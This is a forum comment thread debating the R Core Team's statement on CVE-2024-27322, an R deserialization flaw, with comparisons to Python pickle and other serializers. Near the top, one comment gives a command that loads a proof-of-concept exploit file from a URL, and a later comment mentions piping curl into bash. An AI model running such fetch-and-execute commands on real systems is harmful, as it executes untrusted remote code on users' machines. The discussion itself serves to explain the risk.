Statement on CVE-2024-27322
blog.r-project.org> We reject the idea that there are wider security implications associated with promises or serialization, both of which are core features of the language.
Isn't this demonstrably false? I.e. run this [1]
load(url("https://github.com/hrbrmstr/rdaradar/raw/main/exploit.rda"))
and it opens the calculator application on windows/macOS (or echo's 'pwnd' on linux).
When someone can easily cause their hidden system code to run on my computer, that's a pretty serious vulnerability. read.csv() and fromJSON() do not allow this.
I happen to have packages on CRAN that readRDS() from AWS S3. So if I happen to be evil and make some trivial alterations to those RDS files to contain a hidden payload, well, it's child's play. That does not seem sane to me.
FWIW, my recommendation is to create a function like readRDS() that only reads data (and does not allow any extra code to be run), then use that in place of the traditional readRDS() on CRAN. Then if someone did craft a malicious payload, it wouldn't matter. The (harder) alternative would be to disallow any functions that have this remote code execution 'feature', e.g. only read.csv() or fromJSON() and similar.
[1] https://rud.is/b/2024/05/03/cve-2024-27322-should-never-have...
It's hard not to read the quote you give as basically admitting that they _can't_ entertain the idea that there are "wider security implications" because that would be tacitly admitting that the language itself is built on shaky foundations. Something being a "core feature" _increases_ the scope of any security implications, but it also makes it a lot harder to fix without having to change fundamental parts of the language, and it sounds like that would be a non-starter for them.
Edit: apparently "load" is used to deserialize some data. Ya, this is bad, nevermind. I guess treat data stored in this format as code (effectively: don't use this format) unless it can be guaranteed safe.
I'm not an R programmer, but aren't you downloading a file from the Internet and executing it?
You could do the same thing with python/JavaScript/lua. Heck, you could do it with C - download, compile and then dynamically link.
If you want security don't download files from the internet and execute them.
> aren't you downloading a file from the Internet and executing it?
Downloading, yes, executing, no, or at least not to 99% of R users’ knowledge prior to this recent occurrence.
If a malicious user tries to smuggle something into a csv or json file that isn’t possible. But when reading in an RDS it’s trivial.
I feel very uncomfortable about asking anyone to trust my code that much, even colleagues or friends, and I defnn in it ly don’t feel comfortable trusting theirs.
Their data files on the other hand are fine, I’ll gladly read their csv or json file. (would also be glad for their RDS if there’s a way to read it without also allowing for remote code execution)
I thought that deserialization for more 'language' specific serialization has always had dangers.
Python: https://docs.python.org/3/library/pickle.html Ruby: CVE-2013-0156
I'm sure there is more.
If you're using a serialized format, you get serialized risks.
Is it really execution be design? The docs don't suggest that:
>Description
>Reload datasets written with the function save.
> We reject the idea that there are wider security implications associated with promises or serialization, both of which are core features of the language. Isn't this demonstrably false? I.e. run this [1]
>> This does not prove the concept of promises and/or serialization are inherently unsafe core features. It simply shows there's some implementation issues to address. You go further to talk about these implementation issues which is helpful and good, but it does nothing to prove unsafeness or unsoundness of the concepts of promises or serialization/deserialization etc.
How many languages have gotten and fixed such bugs. Are those languages unsafe/unsane or were their implementations simply buggy?
Though in practice the difference isn't there, as we use language implementations, not their ideal conceptual forms, but I do think its unfair to make such claims, and say that some exploit of a langauge implementation causes the concepts within the language to be inherently exploitable.
- might be missing something, but it seems there's 2 different streams being crossed? (you do make good points about implementation imho, nothing wrong there ofc! :))
Part of this comes to trust and who/where trust decisions happen.
If I read the projects statement right, they think you should only load what you already trust.
The problem is that many people load things they just found on the Internet. Like `curl | bash` to random things people find.
Note, if it's not obvious, `curl | bash` to scripts on the Internet is just as insecure as the current R implementation.
I don’t know. R promises are extremely powerful. Not only can they run arbitrary code (e.g. shell commands), but they have arbitrary access over the caller environment (e.g. you can pass a lazy argument to a function that can list all variable names/values of variables in the function’s body and mutate some of them).
I also don’t know if deserializing is 100% secure even now, because it only detects whether the root value is lazy, and I’m not sure if certain value’s children can be lazy as well.
I think the larger issue is that most languages are insecure unless you go out of your way to be careful. Many package managers (including cargo) let dependencies run arbitrary build scripts. AFAIK reading a Python picklefile can invoke arbitrary code, which is arguably worse than deserializing an RDS file because in R you at least have to read the malicious deserialized value. The problem of reading untrusted data isn’t new, see log4j and SQL injections.
All input should be either a) trusted or b) handled carefully. Then it doesn’t matter the language. The problem is that’s not easy. Like in R, if `readRDS` really can still return promises, then “handling it carefully” means inspecting every nested value without reading it (this is possible in R with reflection); or more likely (as with Python’s pickling), read the data in a more constrained format.
People whose day job is security probably have terms for this, but it seems important to distinguish theoretically-vulnerable and practically-vulnerable.
In the sense that for sufficiently complex ecosystems (read: all widely used programming ecosystems) each component may itself be theoretically secure... and yet the ways they are commonly used in practice are insecure.
>> Users should ensure that they only use R code and data from trusted sources and that the privileges of the account running R are appropriately limited.
IMHO, this is a cop-out. Abrogating responsibility for common use patterns in your ecosystems isn't how you make everyone more secure.
Better: 'What are our users actually doing?' -> 'Why are they doing that?' (usually: inconvenient UX around secure alternatives) -> 'How can we make it easier to use secure alternatives?'
A bit of a strange statement. It's OK guys, for your language to have security related bugs. Fixing the bug, shows it was in the core language and now, having fixed the bug, the language is more secure.
It does touch an interesting point, 'safeness' of a language itself. I think a lot of languages have bugs in their core libraries and implementaties, and you _could_ go as far as to say that language is then insecure.
But this is not really true. The language itself, is not its implementation. The design choices and concepts provided by R, i think, are not inherently insecure. Though, as this bug shows, implementation of those concepts, can be done, inadvertendly/unwittingly, in an insecure way.
I would like to encourage people to stop speaking about languages as safe/unsafe. This seems to popular today. The languages themselves are complicated to implement as hell, and there comes bugs with complex implementations.
Raise the bug, perhaps if severe, raise awareness of it. But don't shit on decades of diligent people's work because you found a bug and want your company or group to get some good marketing out of it. this is inherently unethical. These people are great programmers, likely much more advanced in their knowlege of languages and language implementation than some hacker who runs into a security hole. That should be respected and commended, and hackers can help these guys to improve their already awesome creations.
Thanks to the implementers, thanks to the hackers, and lets all be friendly and peaceful, and not try to exploit someones honest bug into some marketing opportunity by taking a shit right on their work.
It’s going to be impossible to get the majority of r users to update r to remove this vulnerability. Not the fault of r but because so many unsophisticated users have r installed from 4 years ago, this exploit (which is not much of an exploit really) will stick around forever.
Have there been more CVEs lately, or did the whole Jia Tian thing make them rank higher on HN?
There have been more CVEs for the last 5 or so years. The reason is that "number of CVEs" is used in InfoSec community as kind of performance metric, so the "researchers" are incentivized to report total non-sense as security vulnerabilities. Second reason is that the whole "InfoSec" thing is viewed as an career choice where there is shitload of money to be made, which caused many people with questionable skills and ethics to become "security researchers".
On the other hand, scanners do flag CVEs (and therefore regulatory patch requirements are triggered by them).
So at the end of the day, it does apply patch pressure to regulated companies.
Autogenerated security audits that flag totally irellevant CVEs are another symptom of the same problem. Such scans usually only compare the version of the package in question, which breaks badly when distributions backport security patches and leads to complete irrelevant results when the "vulnerability" in question pertain to configuration that is not used (good example of that are CVEs for the mail-proxy component of nginx, which I assume most people do not even know exists, yet alone deploy). In the end the main effect is that if there was some real security issue, it would get buried deep in all that pointless busy-work that InfoSec comunity generates for everybody else.
100% granted: the avalanche of CVEs is a serious problem.
Which is why the scanner companies are actually providing a "tell me what I need to care about" service.
In general, it does feel like we're groping (blindly) towards a healthier future.
I'd imagine a bit of both. More people looking for issues because of it, and then also because of something so high profile people are more likely to pay attention and upvote because they've seen more recently.
For example 2023q1 vs 2024q1: 7,015 vs 8,697 [1].
tl;dr R has its own pickle.load and someone decided to milk a CVE [1] out of this fact.
[1] and a blog post for bragging, thankfully they didn't do a name and a logo.
This is uncharitable.
From what I can tell, these RDS files are a common way of sharing data among R users. I would be relatively surprised if reading someone else's dataset was able to execute arbitrary code.
I think this is more like if reading a CSV via numpy could execute code.
RDS files are a common way of sharing serialized R objects. Promises are valid R objects and supported by this serialization format. They always have been and I believe it is an intentional feature. The problem is that some people may think of RDS files as more convenient CSV files, but they are not.
CSV is CSV. A serialized object is a serialized object. The main concern they cite, are supply chain attacks. So it’s like saying loading a package can… load a package. Supply chain attacks will always be a thing. I’m grateful for the work of the researchers in question but don’t feel this is much of a blemish when it comes to R itself being insecure.
I think the researchers didn’t identify the main vulnerability. They should have talked about the risk of remote code execution from reading serialized objects from untrusted sources, when the R programmer thinks they are reading data but they are actually running code. This mistake has led to huge numbers of remote code execution vulnerabilities in all sorts of object deserialization libraries; it’s a much more common threat than supply chain attacks.
It’s true that it’s always been that way, but there are other common but unsafe ways of doing things that people eventually stopped using. Some pressure to deprecate and migrate away from unsafe API’s seems good.
Is there another way to load a saved dataset in R though, so that it can't execute anything?
Save it in the usual text-based formats, like a CSV or JSON. Outside of packages, which use serialized data by default for good reasons, I haven't seen many people loading strangers' RDS or RData files.
If an attacker can control a package's rdb and rdx files, it's game over. They could just stick an `.onAttach` function in that does whatever they want when the package is loaded directly or imported by another package.
The fact that they had to mess with unbounded promises, and that the bug got fixed suggests you normally can't run any code from load().
.pkl files were, are, and will still be a a common way of sharing data among Python users. Despite it is known to be unsafe since forever and nobody claimed a CVE for this fact.
A few years back I have heard from a lot of people working in ML communities that they are surprised that `numpy.load` is able to execute arbitrary code.
There are lots of Python pickle remote code execution CVEs https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=pickle
> A few years back I have heard from a lot of people working in ML communities that they are surprised that `numpy.load` is able to execute arbitrary code.
This is correct, before version 1.16.3 (April 2019) `numpy.load` was unsafe by default, unless explicitly specifying `allow_pickle=False`. However, to be clear, that unsafe default was then fortunately changed. Loading numpy arrays with `numpy.load` should now be safe (unless there are yet-to-be-found bugs in that code).
> Despite it is known to be unsafe since forever and nobody claimed a CVE for this fact.
There have been dozens, if not _hundreds_, of CVEs filed on issues related to pickle and RCE.
Here is a small sample:
Those are CVEs on other software that use pickle in insecure ways. Not on pickle itself.
In applications using pickle on untrusted data, that's a big distinction. There are a huge number of similar java and c# object serializationg bugs as well.
There aren't in C#. Neither Newtonsoft.JSON (by default) nor System.Text.Json (at all) allow uncontrolled deserialization. Pretty much no code ever defaulted to Newtonsoft's TypeNameHandling.Auto and community has always been aware of its dangers, espcially in light of the incidents like Log4J.
And BinaryFormatter has been long ago deprecated (and now it got completely removed, in the form of a breaking change, something that pretty much never happens otherwise), and even when it was in use (more than a decade ago, popularity-wise), the use of type binding was heavily encouraged.
C# is pretty hard-nosed about serialization.
E.g. My discovery the other day that out of the box C# System.Text.Json can't serialize System.Exception without writing a custom serializer [0] (since 2020, because .NET fix speed...). NewtonSoft handles it fine. (Had wanted a quick-and-dirty debugging dump of properties)
A serializer cannot make a reasonable assumption about how an exception should be serialized on the user's behalf, let alone deserialized. Newtonsoft had and still has quite a few problematic defaults where people can inadvertently weaken privacy and security of the implementation, which System.Text.Json is opinionated in solving.
If you are okay with risks that come from including exception's message in data sent over the network (e.g. not publicly exposed), then defining a custom converter is trivial (it's like 10-15 lines and adding it to serializer options), or you could simply .ToString/.Message it and include that in the payload instead. It's a minute thing.
As for exception deserialization, that's a gross feature misuse and not something that should be done.
To me, it feels like an abuse of "you shouldn't be doing that"-ism.
A serializer should generate a sane serialization of whatever I throw at it. Or at least have an option that allows me to force that.
If I then choose to send that serialization somewhere unreasonable, that's on me.
In my case, I was hacking in C#-on-top-of-another-environment, so didn't have full access to reimplement stuff, without jumping through additional hoops.
That said, absolutely agreed on de-serialization, as larger opportunities for footguns abound.
I was thinking of BinaryFormatter and NetDataContractSerializer, etc. unsafe .NET object deserialization. I'm sure the default JSON serializer in C# is safe (lmao language fanboys)
Yes but the fact that R was apparently able to fix the issue at all is a bit strange then. You can't "fix" pickle code execution.
Weird. I don't think I've ever relied on pickle for sharing data. It's too version specific. I always dump to json, or similar.
See it all the time.
CVE-2019-6446 seems to be in the right ballpark.
I think a good response from the R authors should:
• Make clear the bug is due to unsafe deserialization (not serialization as their statement says). This is important because unsafe deserialization is a major source of remote code execution vulnerabilities.
• Update the documentation to make it clear that R’s serialization and deserialization functions are not safe to use for sharing data across the network. Serialized objects should be treated as code, not data.
Blog post in question: https://hiddenlayer.com/research/r-bitrary-code-execution/
>and a blog post for bragging, thankfully they didn't do a name and a logo.
I am still amazed on how many people on HN seem to get worked up over vulnerability names. God forbid someone also slaps a piece of clip art or whatever on the blog post. Worse yet, if they buy a $5 domain... the horror!
Maybe it's just me, but I'd much rather remember "Heartbleed" over "CVE-2014-0160".
It's fine when your bugs are (unanimously) cool, be it Heartbleed, Meltdown, Spectre or Load Value Injection (this one gets a hilarious video even).
For less cool bugs a logo and a name seems rather... strange, because it happens all the time and it's not clear why it's special. Imagine a coworker fixed a random JIRA ticket which may be "switching to night mode does not work on a certain page" and then named it "Nightfall" and a logo and a landing page and a lot of bragging in the next periodic meeting.
> Imagine a coworker fixed a random JIRA ticket which may be "switching to night mode does not work on a certain page" and then named it "Nightfall" and a logo and a landing page and a lot of bragging in the next periodic meeting.
Well, that would be hilarious.
> This is a brief statement on behalf or the R Core Team on the serialization bug recently reported by the cybersecurity form HiddenLayer.
Cybersecurity firm, surely? Of all the things not to proofread … a press release.